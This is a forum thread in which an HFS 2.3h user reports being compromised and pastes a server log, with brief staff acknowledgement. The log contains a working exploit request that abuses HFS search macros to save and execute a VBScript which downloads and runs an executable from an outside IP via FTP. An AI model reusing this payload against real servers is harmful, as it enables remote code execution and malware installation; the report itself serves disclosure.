rejetto forum

Execution Exploit in search function

apanx · 5 · 13554

0 Members and 1 Guest are viewing this topic.

Offline apanx

  • Occasional poster
  • *
    • Posts: 1
    • View Profile
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a vbsscript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.

Code: [Select]
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum
https://www.exploit-db.com/exploits/34668/
« Last Edit: June 14, 2016, 09:33:00 PM by apanx »


Offline Mars

  • Operator
  • Tireless poster
  • *****
    • Posts: 2063
    • View Profile
Thank for report, rejetto is beginning to address the issue


Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13521
    • View Profile

Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13521
    • View Profile

Offline Fysack

  • Tireless poster
  • ****
    • Posts: 598
  • present picture
    • View Profile
    • Admin